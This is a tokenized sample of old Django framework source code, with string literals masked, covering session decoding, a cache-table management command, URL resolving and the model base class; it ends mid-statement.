<EOL> db_table = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> def get_decoded ( self ) : <EOL> encoded_data = base64 . decodestring ( self . session_data ) <EOL> pickled , tamper_check = encoded_data [ : - <NUM_LIT:32> ] , encoded_data [ - <NUM_LIT:32> : ] <EOL> if md5_constructor ( pickled + settings . SECRET_KEY ) . hexdigest ( ) != tamper_check : <EOL> from django . core . exceptions import SuspiciousOperation <EOL> raise SuspiciousOperation , "<STR_LIT>" <EOL> try : <EOL> return pickle . loads ( pickled ) <EOL> except : <EOL> return { } </s>
<s> from django . core . management . base import LabelCommand <EOL> class Command ( LabelCommand ) : <EOL> help = "<STR_LIT>" <EOL> args = "<STR_LIT>" <EOL> label = '<STR_LIT>' <EOL> requires_model_validation = False <EOL> def handle_label ( self , tablename , ** options ) : <EOL> from django . db import connection , transaction , models <EOL> fields = ( <EOL> models . CharField ( name = '<STR_LIT>' , max_length = <NUM_LIT:255> , unique = True , primary_key = True ) , <EOL> models . TextField ( name = '<STR_LIT:value>' ) , <EOL> models . DateTimeField ( name = '<STR_LIT>' , db_index = True ) , <EOL> ) <EOL> table_output = [ ] <EOL> index_output = [ ] <EOL> qn = connection . ops . quote_name <EOL> for f in fields : <EOL> field_output = [ qn ( f . name ) , f . db_type ( ) ] <EOL> field_output . append ( "<STR_LIT>" % ( not f . null and "<STR_LIT>" or "<STR_LIT>" ) ) <EOL> if f . primary_key : <EOL> field_output . append ( "<STR_LIT>" ) <EOL> elif f . unique : <EOL> field_output . append ( "<STR_LIT>" ) <EOL> if f . db_index : <EOL> unique = f . unique and "<STR_LIT>" or "<STR_LIT>" <EOL> index_output . append ( "<STR_LIT>" % ( unique , tablename , f . name , qn ( tablename ) , <EOL> qn ( f . name ) ) ) <EOL> table_output . append ( "<STR_LIT:U+0020>" . join ( field_output ) ) <EOL> full_statement = [ "<STR_LIT>" % qn ( tablename ) ] <EOL> for i , line in enumerate ( table_output ) : <EOL> full_statement . append ( '<STR_LIT>' % ( line , i < len ( table_output ) - <NUM_LIT:1> and '<STR_LIT:U+002C>' or '<STR_LIT>' ) ) <EOL> full_statement . append ( '<STR_LIT>' ) <EOL> curs = connection . cursor ( ) <EOL> curs . execute ( "<STR_LIT:\n>" . join ( full_statement ) ) <EOL> for statement in index_output : <EOL> curs . execute ( statement ) <EOL> transaction . commit_unless_managed ( ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from django . http import Http404 <EOL> from django . core . exceptions import ImproperlyConfigured , ViewDoesNotExist <EOL> from django . utils . datastructures import MultiValueDict <EOL> from django . utils . encoding import iri_to_uri , force_unicode , smart_str <EOL> from django . utils . functional import memoize <EOL> from django . utils . importlib import import_module <EOL> from django . utils . regex_helper import normalize <EOL> from django . utils . thread_support import currentThread <EOL> try : <EOL> reversed <EOL> except NameError : <EOL> from django . utils . itercompat import reversed <EOL> from sets import Set as set <EOL> _resolver_cache = { } <EOL> _callable_cache = { } <EOL> _prefixes = { } <EOL> class Resolver404 ( Http404 ) : <EOL> pass <EOL> class NoReverseMatch ( Exception ) : <EOL> silent_variable_failure = True <EOL> def get_callable ( lookup_view , can_fail = False ) : <EOL> """<STR_LIT>""" <EOL> if not callable ( lookup_view ) : <EOL> try : <EOL> lookup_view = lookup_view . encode ( '<STR_LIT:ascii>' ) <EOL> mod_name , func_name = get_mod_func ( lookup_view ) <EOL> if func_name != '<STR_LIT>' : <EOL> lookup_view = getattr ( import_module ( mod_name ) , func_name ) <EOL> if not callable ( lookup_view ) : <EOL> raise AttributeError ( "<STR_LIT>" % ( mod_name , func_name ) ) <EOL> except ( ImportError , AttributeError ) : <EOL> if not can_fail : <EOL> raise <EOL> except UnicodeEncodeError : <EOL> pass <EOL> return lookup_view <EOL> get_callable = memoize ( get_callable , _callable_cache , <NUM_LIT:1> ) <EOL> def get_resolver ( urlconf ) : <EOL> if urlconf is None : <EOL> from django . conf import settings <EOL> urlconf = settings . ROOT_URLCONF <EOL> return RegexURLResolver ( r'<STR_LIT>' , urlconf ) <EOL> get_resolver = memoize ( get_resolver , _resolver_cache , <NUM_LIT:1> ) <EOL> def get_mod_func ( callback ) : <EOL> try : <EOL> dot = callback . 
rindex ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> return callback , '<STR_LIT>' <EOL> return callback [ : dot ] , callback [ dot + <NUM_LIT:1> : ] <EOL> class RegexURLPattern ( object ) : <EOL> def __init__ ( self , regex , callback , default_args = None , name = None ) : <EOL> self . regex = re . compile ( regex , re . UNICODE ) <EOL> if callable ( callback ) : <EOL> self . _callback = callback <EOL> else : <EOL> self . _callback = None <EOL> self . _callback_str = callback <EOL> self . default_args = default_args or { } <EOL> self . name = name <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . name , self . regex . pattern ) <EOL> def add_prefix ( self , prefix ) : <EOL> """<STR_LIT>""" <EOL> if not prefix or not hasattr ( self , '<STR_LIT>' ) : <EOL> return <EOL> self . _callback_str = prefix + '<STR_LIT:.>' + self . _callback_str <EOL> def resolve ( self , path ) : <EOL> match = self . regex . search ( path ) <EOL> if match : <EOL> kwargs = match . groupdict ( ) <EOL> if kwargs : <EOL> args = ( ) <EOL> else : <EOL> args = match . groups ( ) <EOL> kwargs . update ( self . default_args ) <EOL> return self . callback , args , kwargs <EOL> def _get_callback ( self ) : <EOL> if self . _callback is not None : <EOL> return self . _callback <EOL> try : <EOL> self . _callback = get_callable ( self . _callback_str ) <EOL> except ImportError , e : <EOL> mod_name , _ = get_mod_func ( self . _callback_str ) <EOL> raise ViewDoesNotExist , "<STR_LIT>" % ( mod_name , str ( e ) ) <EOL> except AttributeError , e : <EOL> mod_name , func_name = get_mod_func ( self . _callback_str ) <EOL> raise ViewDoesNotExist , "<STR_LIT>" % ( func_name , mod_name , str ( e ) ) <EOL> return self . _callback <EOL> callback = property ( _get_callback ) <EOL> class RegexURLResolver ( object ) : <EOL> def __init__ ( self , regex , urlconf_name , default_kwargs = None , app_name = None , namespace = None ) : <EOL> self . regex = re . 
compile ( regex , re . UNICODE ) <EOL> self . urlconf_name = urlconf_name <EOL> if not isinstance ( urlconf_name , basestring ) : <EOL> self . _urlconf_module = self . urlconf_name <EOL> self . callback = None <EOL> self . default_kwargs = default_kwargs or { } <EOL> self . namespace = namespace <EOL> self . app_name = app_name <EOL> self . _reverse_dict = None <EOL> self . _namespace_dict = None <EOL> self . _app_dict = None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . urlconf_name , self . app_name , self . namespace , self . regex . pattern ) <EOL> def _populate ( self ) : <EOL> lookups = MultiValueDict ( ) <EOL> namespaces = { } <EOL> apps = { } <EOL> for pattern in reversed ( self . url_patterns ) : <EOL> p_pattern = pattern . regex . pattern <EOL> if p_pattern . startswith ( '<STR_LIT>' ) : <EOL> p_pattern = p_pattern [ <NUM_LIT:1> : ] <EOL> if isinstance ( pattern , RegexURLResolver ) : <EOL> if pattern . namespace : <EOL> namespaces [ pattern . namespace ] = ( p_pattern , pattern ) <EOL> if pattern . app_name : <EOL> apps . setdefault ( pattern . app_name , [ ] ) . append ( pattern . namespace ) <EOL> else : <EOL> parent = normalize ( pattern . regex . pattern ) <EOL> for name in pattern . reverse_dict : <EOL> for matches , pat in pattern . reverse_dict . getlist ( name ) : <EOL> new_matches = [ ] <EOL> for piece , p_args in parent : <EOL> new_matches . extend ( [ ( piece + suffix , p_args + args ) for ( suffix , args ) in matches ] ) <EOL> lookups . appendlist ( name , ( new_matches , p_pattern + pat ) ) <EOL> for namespace , ( prefix , sub_pattern ) in pattern . namespace_dict . items ( ) : <EOL> namespaces [ namespace ] = ( p_pattern + prefix , sub_pattern ) <EOL> for app_name , namespace_list in pattern . app_dict . items ( ) : <EOL> apps . setdefault ( app_name , [ ] ) . extend ( namespace_list ) <EOL> else : <EOL> bits = normalize ( p_pattern ) <EOL> lookups . appendlist ( pattern . 
callback , ( bits , p_pattern ) ) <EOL> lookups . appendlist ( pattern . name , ( bits , p_pattern ) ) <EOL> self . _reverse_dict = lookups <EOL> self . _namespace_dict = namespaces <EOL> self . _app_dict = apps <EOL> def _get_reverse_dict ( self ) : <EOL> if self . _reverse_dict is None : <EOL> self . _populate ( ) <EOL> return self . _reverse_dict <EOL> reverse_dict = property ( _get_reverse_dict ) <EOL> def _get_namespace_dict ( self ) : <EOL> if self . _namespace_dict is None : <EOL> self . _populate ( ) <EOL> return self . _namespace_dict <EOL> namespace_dict = property ( _get_namespace_dict ) <EOL> def _get_app_dict ( self ) : <EOL> if self . _app_dict is None : <EOL> self . _populate ( ) <EOL> return self . _app_dict <EOL> app_dict = property ( _get_app_dict ) <EOL> def resolve ( self , path ) : <EOL> tried = [ ] <EOL> match = self . regex . search ( path ) <EOL> if match : <EOL> new_path = path [ match . end ( ) : ] <EOL> for pattern in self . url_patterns : <EOL> try : <EOL> sub_match = pattern . resolve ( new_path ) <EOL> except Resolver404 , e : <EOL> sub_tried = e . args [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) <EOL> if sub_tried is not None : <EOL> tried . extend ( [ ( pattern . regex . pattern + '<STR_LIT:U+0020>' + t ) for t in sub_tried ] ) <EOL> else : <EOL> tried . append ( pattern . regex . pattern ) <EOL> else : <EOL> if sub_match : <EOL> sub_match_dict = dict ( [ ( smart_str ( k ) , v ) for k , v in match . groupdict ( ) . items ( ) ] ) <EOL> sub_match_dict . update ( self . default_kwargs ) <EOL> for k , v in sub_match [ <NUM_LIT:2> ] . iteritems ( ) : <EOL> sub_match_dict [ smart_str ( k ) ] = v <EOL> return sub_match [ <NUM_LIT:0> ] , sub_match [ <NUM_LIT:1> ] , sub_match_dict <EOL> tried . append ( pattern . regex . pattern ) <EOL> raise Resolver404 , { '<STR_LIT>' : tried , '<STR_LIT:path>' : new_path } <EOL> raise Resolver404 , { '<STR_LIT:path>' : path } <EOL> def _get_urlconf_module ( self ) : <EOL> try : <EOL> return self . 
_urlconf_module <EOL> except AttributeError : <EOL> self . _urlconf_module = import_module ( self . urlconf_name ) <EOL> return self . _urlconf_module <EOL> urlconf_module = property ( _get_urlconf_module ) <EOL> def _get_url_patterns ( self ) : <EOL> patterns = getattr ( self . urlconf_module , "<STR_LIT>" , self . urlconf_module ) <EOL> try : <EOL> iter ( patterns ) <EOL> except TypeError : <EOL> raise ImproperlyConfigured ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . urlconf_name ) <EOL> return patterns <EOL> url_patterns = property ( _get_url_patterns ) <EOL> def _resolve_special ( self , view_type ) : <EOL> callback = getattr ( self . urlconf_module , '<STR_LIT>' % view_type ) <EOL> mod_name , func_name = get_mod_func ( callback ) <EOL> try : <EOL> return getattr ( import_module ( mod_name ) , func_name ) , { } <EOL> except ( ImportError , AttributeError ) , e : <EOL> raise ViewDoesNotExist , "<STR_LIT>" % ( callback , str ( e ) ) <EOL> def resolve404 ( self ) : <EOL> return self . _resolve_special ( '<STR_LIT>' ) <EOL> def resolve500 ( self ) : <EOL> return self . _resolve_special ( '<STR_LIT>' ) <EOL> def reverse ( self , lookup_view , * args , ** kwargs ) : <EOL> if args and kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> try : <EOL> lookup_view = get_callable ( lookup_view , True ) <EOL> except ( ImportError , AttributeError ) , e : <EOL> raise NoReverseMatch ( "<STR_LIT>" % ( lookup_view , e ) ) <EOL> possibilities = self . reverse_dict . getlist ( lookup_view ) <EOL> for possibility , pattern in possibilities : <EOL> for result , params in possibility : <EOL> if args : <EOL> if len ( args ) != len ( params ) : <EOL> continue <EOL> unicode_args = [ force_unicode ( val ) for val in args ] <EOL> candidate = result % dict ( zip ( params , unicode_args ) ) <EOL> else : <EOL> if set ( kwargs . keys ( ) ) != set ( params ) : <EOL> continue <EOL> unicode_kwargs = dict ( [ ( k , force_unicode ( v ) ) for ( k , v ) in kwargs . 
items ( ) ] ) <EOL> candidate = result % unicode_kwargs <EOL> if re . search ( u'<STR_LIT>' % pattern , candidate , re . UNICODE ) : <EOL> return candidate <EOL> raise NoReverseMatch ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( lookup_view , args , kwargs ) ) <EOL> def resolve ( path , urlconf = None ) : <EOL> return get_resolver ( urlconf ) . resolve ( path ) <EOL> def reverse ( viewname , urlconf = None , args = None , kwargs = None , prefix = None , current_app = None ) : <EOL> resolver = get_resolver ( urlconf ) <EOL> args = args or [ ] <EOL> kwargs = kwargs or { } <EOL> if prefix is None : <EOL> prefix = get_script_prefix ( ) <EOL> if not isinstance ( viewname , basestring ) : <EOL> view = viewname <EOL> else : <EOL> parts = viewname . split ( '<STR_LIT::>' ) <EOL> parts . reverse ( ) <EOL> view = parts [ <NUM_LIT:0> ] <EOL> path = parts [ <NUM_LIT:1> : ] <EOL> resolved_path = [ ] <EOL> while path : <EOL> ns = path . pop ( ) <EOL> try : <EOL> app_list = resolver . app_dict [ ns ] <EOL> if current_app and current_app in app_list : <EOL> ns = current_app <EOL> elif ns not in app_list : <EOL> ns = app_list [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> pass <EOL> try : <EOL> extra , resolver = resolver . namespace_dict [ ns ] <EOL> resolved_path . append ( ns ) <EOL> prefix = prefix + extra <EOL> except KeyError , key : <EOL> if resolved_path : <EOL> raise NoReverseMatch ( "<STR_LIT>" % ( key , '<STR_LIT::>' . join ( resolved_path ) ) ) <EOL> else : <EOL> raise NoReverseMatch ( "<STR_LIT>" % key ) <EOL> return iri_to_uri ( u'<STR_LIT>' % ( prefix , resolver . reverse ( view , <EOL> * args , ** kwargs ) ) ) <EOL> def clear_url_caches ( ) : <EOL> global _resolver_cache <EOL> global _callable_cache <EOL> _resolver_cache . clear ( ) <EOL> _callable_cache . clear ( ) <EOL> def set_script_prefix ( prefix ) : <EOL> """<STR_LIT>""" <EOL> if not prefix . 
endswith ( '<STR_LIT:/>' ) : <EOL> prefix += '<STR_LIT:/>' <EOL> _prefixes [ currentThread ( ) ] = prefix <EOL> def get_script_prefix ( ) : <EOL> """<STR_LIT>""" <EOL> return _prefixes . get ( currentThread ( ) , u'<STR_LIT:/>' ) </s>
<s> import copy <EOL> import types <EOL> import sys <EOL> import os <EOL> from itertools import izip <EOL> try : <EOL> set <EOL> except NameError : <EOL> from sets import Set as set <EOL> import django . db . models . manager <EOL> from django . core . exceptions import ObjectDoesNotExist , MultipleObjectsReturned , FieldError <EOL> from django . db . models . fields import AutoField , FieldDoesNotExist <EOL> from django . db . models . fields . related import OneToOneRel , ManyToOneRel , OneToOneField <EOL> from django . db . models . query import delete_objects , Q <EOL> from django . db . models . query_utils import CollectedObjects , DeferredAttribute <EOL> from django . db . models . options import Options <EOL> from django . db import connection , transaction , DatabaseError <EOL> from django . db . models import signals <EOL> from django . db . models . loading import register_models , get_model <EOL> from django . utils . functional import curry <EOL> from django . utils . encoding import smart_str , force_unicode , smart_unicode <EOL> from django . conf import settings <EOL> class ModelBase ( type ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> super_new = super ( ModelBase , cls ) . __new__ <EOL> parents = [ b for b in bases if isinstance ( b , ModelBase ) ] <EOL> if not parents : <EOL> return super_new ( cls , name , bases , attrs ) <EOL> module = attrs . pop ( '<STR_LIT>' ) <EOL> new_class = super_new ( cls , name , bases , { '<STR_LIT>' : module } ) <EOL> attr_meta = attrs . pop ( '<STR_LIT:Meta>' , None ) <EOL> abstract = getattr ( attr_meta , '<STR_LIT>' , False ) <EOL> if not attr_meta : <EOL> meta = getattr ( new_class , '<STR_LIT:Meta>' , None ) <EOL> else : <EOL> meta = attr_meta <EOL> base_meta = getattr ( new_class , '<STR_LIT>' , None ) <EOL> if getattr ( meta , '<STR_LIT>' , None ) is None : <EOL> model_module = sys . modules [ new_class . __module__ ] <EOL> kwargs = { "<STR_LIT>" : model_module . __name__ . 
split ( '<STR_LIT:.>' ) [ - <NUM_LIT:2> ] } <EOL> else : <EOL> kwargs = { } <EOL> new_class . add_to_class ( '<STR_LIT>' , Options ( meta , ** kwargs ) ) <EOL> if not abstract : <EOL> new_class . add_to_class ( '<STR_LIT>' , <EOL> subclass_exception ( '<STR_LIT>' , ObjectDoesNotExist , module ) ) <EOL> new_class . add_to_class ( '<STR_LIT>' , <EOL> subclass_exception ( '<STR_LIT>' , MultipleObjectsReturned , module ) ) <EOL> if base_meta and not base_meta . abstract : <EOL> if not hasattr ( meta , '<STR_LIT>' ) : <EOL> new_class . _meta . ordering = base_meta . ordering <EOL> if not hasattr ( meta , '<STR_LIT>' ) : <EOL> new_class . _meta . get_latest_by = base_meta . get_latest_by <EOL> is_proxy = new_class . _meta . proxy <EOL> if getattr ( new_class , '<STR_LIT>' , None ) : <EOL> if not is_proxy : <EOL> new_class . _default_manager = None <EOL> new_class . _base_manager = None <EOL> else : <EOL> new_class . _default_manager = new_class . _default_manager . _copy_to_model ( new_class ) <EOL> new_class . _base_manager = new_class . _base_manager . _copy_to_model ( new_class ) <EOL> m = get_model ( new_class . _meta . app_label , name , False ) <EOL> if m is not None : <EOL> return m <EOL> for obj_name , obj in attrs . items ( ) : <EOL> new_class . add_to_class ( obj_name , obj ) <EOL> new_fields = new_class . _meta . local_fields + new_class . _meta . local_many_to_many + new_class . _meta . virtual_fields <EOL> field_names = set ( [ f . name for f in new_fields ] ) <EOL> if is_proxy : <EOL> base = None <EOL> for parent in [ cls for cls in parents if hasattr ( cls , '<STR_LIT>' ) ] : <EOL> if parent . _meta . abstract : <EOL> if parent . _meta . fields : <EOL> raise TypeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> continue <EOL> if base is not None : <EOL> raise TypeError ( "<STR_LIT>" % name ) <EOL> else : <EOL> base = parent <EOL> if base is None : <EOL> raise TypeError ( "<STR_LIT>" % name ) <EOL> if ( new_class . _meta . local_fields or <EOL> new_class . 
_meta . local_many_to_many ) : <EOL> raise FieldError ( "<STR_LIT>" <EOL> % name ) <EOL> while base . _meta . proxy : <EOL> base = base . _meta . proxy_for_model <EOL> new_class . _meta . setup_proxy ( base ) <EOL> o2o_map = dict ( [ ( f . rel . to , f ) for f in new_class . _meta . local_fields <EOL> if isinstance ( f , OneToOneField ) ] ) <EOL> for base in parents : <EOL> original_base = base <EOL> if not hasattr ( base , '<STR_LIT>' ) : <EOL> continue <EOL> parent_fields = base . _meta . local_fields + base . _meta . local_many_to_many <EOL> for field in parent_fields : <EOL> if field . name in field_names : <EOL> raise FieldError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( field . name , name , base . __name__ ) ) <EOL> if not base . _meta . abstract : <EOL> while base . _meta . proxy : <EOL> base = base . _meta . proxy_for_model <EOL> if base in o2o_map : <EOL> field = o2o_map [ base ] <EOL> elif not is_proxy : <EOL> attr_name = '<STR_LIT>' % base . _meta . module_name <EOL> field = OneToOneField ( base , name = attr_name , <EOL> auto_created = True , parent_link = True ) <EOL> new_class . add_to_class ( attr_name , field ) <EOL> else : <EOL> field = None <EOL> new_class . _meta . parents [ base ] = field <EOL> else : <EOL> for field in parent_fields : <EOL> new_class . add_to_class ( field . name , copy . deepcopy ( field ) ) <EOL> new_class . _meta . parents . update ( base . _meta . parents ) <EOL> new_class . copy_managers ( base . _meta . abstract_managers ) <EOL> if is_proxy : <EOL> new_class . copy_managers ( original_base . _meta . concrete_managers ) <EOL> for field in base . _meta . virtual_fields : <EOL> if base . _meta . abstract and field . name in field_names : <EOL> raise FieldError ( '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' % ( field . name , name , base . __name__ ) ) <EOL> new_class . add_to_class ( field . name , copy . deepcopy ( field ) ) <EOL> if abstract : <EOL> attr_meta . abstract = False <EOL> new_class . 
Meta = attr_meta <EOL> return new_class <EOL> new_class . _prepare ( ) <EOL> register_models ( new_class . _meta . app_label , new_class ) <EOL> return get_model ( new_class . _meta . app_label , name , False ) <EOL> def copy_managers ( cls , base_managers ) : <EOL> base_managers . sort ( ) <EOL> for _ , mgr_name , manager in base_managers : <EOL> val = getattr ( cls , mgr_name , None ) <EOL> if not val or val is manager : <EOL> new_manager = manager . _copy_to_model ( cls ) <EOL> cls . add_to_class ( mgr_name , new_manager ) <EOL> def add_to_class ( cls , name , value ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> value . contribute_to_class ( cls , name ) <EOL> else : <EOL> setattr ( cls , name , value ) <EOL> def _prepare ( cls ) : <EOL> """<STR_LIT>""" <EOL> opts = cls . _meta <EOL> opts . _prepare ( cls ) <EOL> if opts . order_with_respect_to : <EOL> cls . get_next_in_order = curry ( cls . _get_next_or_previous_in_order , is_next = True ) <EOL> cls . get_previous_in_order = curry ( cls . _get_next_or_previous_in_order , is_next = False ) <EOL> setattr ( opts . order_with_respect_to . rel . to , '<STR_LIT>' % cls . __name__ . lower ( ) , curry ( method_get_order , cls ) ) <EOL> setattr ( opts . order_with_respect_to . rel . to , '<STR_LIT>' % cls . __name__ . lower ( ) , curry ( method_set_order , cls ) ) <EOL> if cls . __doc__ is None : <EOL> cls . __doc__ = "<STR_LIT>" % ( cls . __name__ , "<STR_LIT:U+002CU+0020>" . join ( [ f . attname for f in opts . fields ] ) ) <EOL> if hasattr ( cls , '<STR_LIT>' ) : <EOL> cls . get_absolute_url = curry ( get_absolute_url , opts , cls . get_absolute_url ) <EOL> signals . class_prepared . send ( sender = cls ) <EOL> class Model ( object ) : <EOL> __metaclass__ = ModelBase <EOL> _deferred = False <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> signals . pre_init . send ( sender = self . __class__ , args = args , kwargs = kwargs ) <EOL> args_len = len ( args ) <EOL> if args_len > len ( self . _meta . 
fields ) : <EOL> raise IndexError ( "<STR_LIT>" ) <EOL> fields_iter = iter ( self . _meta . fields ) <EOL> if not kwargs : <EOL> for val , field in izip ( args , fields_iter ) : <EOL> setattr ( self , field . attname , val ) <EOL> else : <EOL> for val , field in izip ( args , fields_iter ) : <EOL> setattr ( self , field . attname , val ) <EOL> kwargs . pop ( field . name , None ) <EOL> if isinstance ( field . rel , ManyToOneRel ) : <EOL> kwargs . pop ( field . attname , None ) <EOL> for field in fields_iter : <EOL> is_related_object = False <EOL> if ( field . attname not in kwargs and <EOL> isinstance ( self . __class__ . __dict__ . get ( field . attname ) , DeferredAttribute ) ) : <EOL> continue <EOL> if kwargs : <EOL> if isinstance ( field . rel , ManyToOneRel ) : <EOL> try : <EOL> rel_obj = kwargs . pop ( field . name ) <EOL> is_related_object = True <EOL> except KeyError : <EOL> try : <EOL> val = kwargs . pop ( field . attname ) <EOL> except KeyError : <EOL> val = field . get_default ( ) <EOL> else : <EOL> if rel_obj is None and field . null : <EOL> val = None <EOL> else : <EOL> val = kwargs . pop ( field . attname , field . get_default ( ) ) <EOL> else : <EOL> val = field . get_default ( ) <EOL> if is_related_object : <EOL> setattr ( self , field . name , rel_obj ) <EOL> else : <EOL> setattr ( self , field . attname , val ) <EOL> if kwargs : <EOL> for prop in kwargs . keys ( ) : <EOL> try : <EOL> if isinstance ( getattr ( self . __class__ , prop ) , property ) : <EOL> setattr ( self , prop , kwargs . pop ( prop ) ) <EOL> except AttributeError : <EOL> pass <EOL> if kwargs : <EOL> raise TypeError , "<STR_LIT>" % kwargs . keys ( ) [ <NUM_LIT:0> ] <EOL> signals . post_init . send ( sender = self . __class__ , instance = self ) <EOL> def __repr__ ( self ) : <EOL> try : <EOL> u = unicode ( self ) <EOL> except ( UnicodeEncodeError , UnicodeDecodeError ) : <EOL> u = '<STR_LIT>' <EOL> return smart_str ( u'<STR_LIT>' % ( self . __class__ . 
__name__ , u ) ) <EOL> def __str__ ( self ) : <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> return force_unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> return '<STR_LIT>' % self . __class__ . __name__ <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . _get_pk_val ( ) == other . _get_pk_val ( ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _get_pk_val ( ) ) <EOL> def __reduce__ ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . __dict__ <EOL> if not self . _deferred : <EOL> return ( self . __class__ , ( ) , data ) <EOL> defers = [ ] <EOL> pk_val = None <EOL> for field in self . _meta . fields : <EOL> if isinstance ( self . __class__ . __dict__ . get ( field . attname ) , <EOL> DeferredAttribute ) : <EOL> defers . append ( field . attname ) <EOL> if pk_val is None : <EOL> obj = self . __class__ . __dict__ [ field . attname ] <EOL> model = obj . model_ref ( ) <EOL> return ( model_unpickle , ( model , defers ) , data ) <EOL> def _get_pk_val ( self , meta = None ) : <EOL> if not meta : <EOL> meta = self . _meta <EOL> return getattr ( self , meta . pk . attname ) <EOL> def _set_pk_val ( self , value ) : <EOL> return setattr ( self , self . _meta . pk . attname , value ) <EOL> pk = property ( _get_pk_val , _set_pk_val ) <EOL> def serializable_value ( self , field_name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> field = self . _meta . get_field_by_name ( field_name ) [ <NUM_LIT:0> ] <EOL> except FieldDoesNotExist : <EOL> return getattr ( self , field_name ) <EOL> return getattr ( self , field . attname ) <EOL> def save ( self , force_insert = False , force_update = False ) : <EOL> """<STR_LIT>""" <EOL> if force_insert and force_update : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . save_base ( force_insert = force_insert , force_update = force_update ) <EOL> save . 
alters_data = True <EOL> def save_base ( self , raw = False , cls = None , origin = None , <EOL> force_insert = False , force_update = False ) : <EOL> """<STR_LIT>""" <EOL> assert not ( force_insert and force_update ) <EOL> if cls is None : <EOL> cls = self . __class__ <EOL> meta = cls . _meta <EOL> if not meta . proxy : <EOL> origin = cls <EOL> else : <EOL> meta = cls . _meta <EOL> if origin : <EOL> signals . pre_save . send ( sender = origin , instance = self , raw = raw ) <EOL> if not raw or meta . proxy : <EOL> if meta . proxy : <EOL> org = cls <EOL> else : <EOL> org = None <EOL> for parent , field in meta . parents . items ( ) : <EOL> if field and getattr ( self , parent . _meta . pk . attname ) is None and getattr ( self , field . attname ) is not None : <EOL> setattr ( self , parent . _meta . pk . attname , getattr ( self , field . attname ) ) <EOL> self . save_base ( cls = parent , origin = org ) <EOL> if field : <EOL> setattr ( self , field . attname , self . _get_pk_val ( parent . _meta ) ) <EOL> if meta . proxy : <EOL> return <EOL> if not meta . proxy : <EOL> non_pks = [ f for f in meta . local_fields if not f . primary_key ] <EOL> pk_val = self . _get_pk_val ( meta ) <EOL> pk_set = pk_val is not None <EOL> record_exists = True <EOL> manager = cls . _base_manager <EOL> if pk_set : <EOL> if ( force_update or ( not force_insert and <EOL> manager . filter ( pk = pk_val ) . extra ( select = { '<STR_LIT:a>' : <NUM_LIT:1> } ) . values ( '<STR_LIT:a>' ) . order_by ( ) ) ) : <EOL> if force_update or non_pks : <EOL> values = [ ( f , None , ( raw and getattr ( self , f . attname ) or f . pre_save ( self , False ) ) ) for f in non_pks ] <EOL> rows = manager . filter ( pk = pk_val ) . 
_update ( values ) <EOL> if force_update and not rows : <EOL> raise DatabaseError ( "<STR_LIT>" ) <EOL> else : <EOL> record_exists = False <EOL> if not pk_set or not record_exists : <EOL> if not pk_set : <EOL> if force_update : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> values = [ ( f , f . get_db_prep_save ( raw and getattr ( self , f . attname ) or f . pre_save ( self , True ) ) ) for f in meta . local_fields if not isinstance ( f , AutoField ) ] <EOL> else : <EOL> values = [ ( f , f . get_db_prep_save ( raw and getattr ( self , f . attname ) or f . pre_save ( self , True ) ) ) for f in meta . local_fields ] <EOL> if meta . order_with_respect_to : <EOL> field = meta . order_with_respect_to <EOL> values . append ( ( meta . get_field_by_name ( '<STR_LIT>' ) [ <NUM_LIT:0> ] , manager . filter ( ** { field . name : getattr ( self , field . attname ) } ) . count ( ) ) ) <EOL> record_exists = False <EOL> update_pk = bool ( meta . has_auto_field and not pk_set ) <EOL> if values : <EOL> result = manager . _insert ( values , return_id = update_pk ) <EOL> else : <EOL> result = manager . _insert ( [ ( meta . pk , connection . ops . pk_default_value ( ) ) ] , return_id = update_pk , raw_values = True ) <EOL> if update_pk : <EOL> setattr ( self , meta . pk . attname , result ) <EOL> transaction . commit_unless_managed ( ) <EOL> if origin : <EOL> signals . post_save . send ( sender = origin , instance = self , <EOL> created = ( not record_exists ) , raw = raw ) <EOL> save_base . alters_data = True <EOL> def _collect_sub_objects ( self , seen_objs , parent = None , nullable = False ) : <EOL> """<STR_LIT>""" <EOL> pk_val = self . _get_pk_val ( ) <EOL> if seen_objs . add ( self . __class__ , pk_val , self , parent , nullable ) : <EOL> return <EOL> for related in self . _meta . get_all_related_objects ( ) : <EOL> rel_opts_name = related . get_accessor_name ( ) <EOL> if isinstance ( related . field . 
